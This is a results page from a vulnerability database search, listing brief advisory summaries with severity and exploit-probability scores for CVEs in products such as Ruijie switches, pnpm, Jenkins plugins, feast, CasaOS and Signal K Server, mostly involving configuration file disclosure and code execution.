Lucene search
K

545 matches found

NVD
NVD
added 2026/01/29 3:16 p.m.14 views

CVE-2020-37015

The Ruijie Networks Switch eWeb S29RGOS version 11.4 contains a directory traversal vulnerability that allows unauthenticated attackers to access sensitive configuration files by manipulating file path parameters. Attackers can exploit the /download.do endpoint with '../' sequences to retrieve...

7.5CVSS0.00619EPSS
Exploits0References4
Snyk
Snyk
added 2026/01/28 11:0 p.m.4 views

Improper Handling of Case Sensitivity

Overview Affected versions of this package are vulnerable to Improper Handling of Case Sensitivity via the /api/file/getFile endpoint. An attacker can access sensitive configuration files by submitting mixed-case paths to bypass case-sensitive checks on case-insensitive file systems. Remediation...

8.7CVSS5.9AI score0.00505EPSS
Exploits1References2
RedhatCVE
RedhatCVE
added 2026/01/27 4:59 a.m.7 views

CVE-2026-23889

A flaw was found in pnpm, a package manager. This vulnerability, known as path traversal, allows a malicious package to write files to unintended locations on Windows systems during the extraction of compressed archives tarballs. The issue arises because pnpm's path normalization process does not...

6.5CVSS6.2AI score0.00433EPSS
Exploits1References6
RedhatCVE
RedhatCVE
added 2026/01/09 10:43 a.m.9 views

CVE-2022-26885

When using tasks to read config files, there is a risk of database password disclosure. We recommend you upgrade to version 2.0.6 or higher...

7.5CVSS6.8AI score0.01234EPSS
Exploits0References1
RedhatCVE
RedhatCVE
added 2026/01/07 9:32 a.m.10 views

CVE-2019-16556

Jenkins Rundeck Plugin 3.6.5 and earlier stores credentials unencrypted in its global configuration file and in job config.xml files on the Jenkins master where they can be viewed by users with Extended Read permission, or access to the master file system...

6.5CVSS6.7AI score0.00852EPSS
Exploits0References1
RedhatCVE
RedhatCVE
added 2026/01/07 9:29 a.m.7 views

CVE-2019-16557

Jenkins Redgate SQL Change Automation Plugin 2.0.3 and earlier stores credentials unencrypted in job config.xml files on the Jenkins master where they can be viewed by users with Extended Read permission, or access to the master file system...

6.5CVSS7.3AI score0.00852EPSS
Exploits0References1
Veracode
Veracode
added 2026/01/07 7:23 a.m.6 views

Remote Code Execution (RCE)

feast is vulnerable to remote code execution RCE. The vulnerability is due to the use of yaml.load..., Loader=yaml.Loader to deserialize configuration YAML files before validation, which allows an attacker who can modify these files to instantiate arbitrary Python objects and execute OS commands ...

7.8CVSS8.2AI score0.00264EPSS
Exploits0References8Affected Software1
OSV
OSV
added 2026/01/06 4:15 p.m.4 views

CVE-2020-36909

SnapGear Management Console SG560 3.1.5 contains a file manipulation vulnerability that allows authenticated users to read, write, and delete files using the editconfigfiles CGI script. Attackers can manipulate POST request parameters in /cgi-bin/cgix/editconfigfiles to access and modify files...

8.8CVSS5.8AI score
Exploits0References5
NVD
NVD
added 2026/01/06 4:15 p.m.9 views

CVE-2020-36909

SnapGear Management Console SG560 3.1.5 contains a file manipulation vulnerability that allows authenticated users to read, write, and delete files using the editconfigfiles CGI script. Attackers can manipulate POST request parameters in /cgi-bin/cgix/editconfigfiles to access and modify files...

8.8CVSS0.00636EPSS
Exploits2References5
Cvelist
Cvelist
added 2026/01/06 3:52 p.m.24 views

CVE-2020-36909 Secure Computing SnapGear Management Console SG560 3.1.5 Arbitrary File Read/Write

SnapGear Management Console SG560 3.1.5 contains a file manipulation vulnerability that allows authenticated users to read, write, and delete files using the editconfigfiles CGI script. Attackers can manipulate POST request parameters in /cgi-bin/cgix/editconfigfiles to access and modify files...

8.7CVSS0.00636EPSS
Exploits2References5
Snyk
Snyk
added 2026/01/05 9:54 p.m.3 views

Missing Authorization

Overview Affected versions of this package are vulnerable to Missing Authorization via the /v1/users/image and /v1/sys/debug endpoints. An attacker can retrieve sensitive configuration files, system debug information, and enumerate file existence by sending crafted requests to these endpoints...

6.9CVSS6.8AI score0.00548EPSS
Exploits0References2
EUVD
EUVD
added 2026/01/02 3:11 p.m.4 views

EUVD-2025-206140

Signal K Server has Unauthenticated State Pollution leading to Remote Code Execution RCE...

9.6CVSS6.9AI score0.17934EPSS
Exploits3References4
Positive Technologies
Positive Technologies
added 2026/01/02 12:0 a.m.4 views

PT-2026-1178

Name of the Vulnerable Software and Affected Versions CasaOS versions up to and including 0.4.15 Description CasaOS versions up to and including 0.4.15 have unauthenticated endpoints that allow remote attackers to retrieve sensitive configuration files and system debug information. The...

6.9CVSS6.2AI score0.00548EPSS
Exploits0References6
CNNVD
CNNVD
added 2026/01/02 12:0 a.m.4 views

CasaOS 安全漏洞

CasaOS is a simple, easy-to-use, and elegant open source home cloud system. A security vulnerability exists in CasaOS 0.4.15 and earlier versions, which stems from the exposure of multiple unauthenticated endpoints and could lead to the disclosure of sensitive configuration files and system...

6.9CVSS6.4AI score0.00548EPSS
Exploits0References4
Vulnrichment
Vulnrichment
added 2026/01/01 6:0 p.m.2 views

CVE-2025-66398 Signal K Server has Unauthenticated State Pollution leading to Remote Code Execution (RCE)

Signal K Server is a server application that runs on a central hub in a boat. Prior to version 2.19.0, an unauthenticated attacker can pollute the internal state restoreFilePath of the server via the /skServer/validateBackup endpoint. This allows the attacker to hijack the administrator's "Restor...

9.6CVSS7.2AI score0.17934EPSS
Exploits3References2
OSV
OSV
added 2026/01/01 7:16 a.m.4 views

CVE-2025-11157

A high-severity remote code execution vulnerability exists in feast-dev/feast version 0.53.0, specifically in the Kubernetes materializer job located at feast/sdk/python/feast/infra/computeengines/kubernetes/main.py. The vulnerability arises from the use of yaml.load..., Loader=yaml.Loader to...

7.8CVSS8.5AI score
Exploits0References2
CNNVD
CNNVD
added 2025/12/30 12:0 a.m.4 views

The Shit 安全漏洞

The Shit is a command line utility from the individual developers of AsfhtgkDavid for automatically detecting and fixing common errors in shell commands. A security vulnerability exists in versions of The Shit prior to 0.1.1 that stems from failure to verify ownership of configuration files and...

6.7CVSS5.8AI score0.0012EPSS
Exploits0References2
Cvelist
Cvelist
added 2025/12/24 7:27 p.m.28 views

CVE-2019-25239 V-SOL GPON/EPON OLT Platform 2.03 Unauthenticated Configuration Download

V-SOL GPON/EPON OLT Platform 2.03 contains an unauthenticated information disclosure vulnerability that allows attackers to download configuration files via direct object reference. Attackers can retrieve sensitive configuration data by sending HTTP GET requests to the usrcfg.conf endpoint,...

8.7CVSS0.00355EPSS
Exploits1References3
Vulnrichment
Vulnrichment
added 2025/12/24 7:27 p.m.4 views

CVE-2018-25137 FLIR Brickstream 3D+ 2.1.742.1842 Unauthenticated Config File Disclosure

FLIR Brickstream 3D+ 2.1.742.1842 contains an unauthenticated vulnerability in the ExportConfig REST API that allows attackers to download sensitive configuration files. Attackers can exploit the getConfigExportFile.cgi endpoint to retrieve system configurations, potentially enabling authenticati...

8.7CVSS6.8AI score0.00434EPSS
Exploits1References3
Veracode
Veracode
added 2025/12/13 4:17 a.m.5 views

Arbitrary Code Execution

QOS.CH logback-core is vulnerable to Arbitrary Code Execution. The vulnerability is due to unsafe conditional processing of configuration files and environment variables, which allows an attacker with existing privileges to inject or modify a malicious configuration and execute arbitrary code at...

7CVSS8AI score0.00181EPSS
Exploits0References6Affected Software1
Rows per page
Query Builder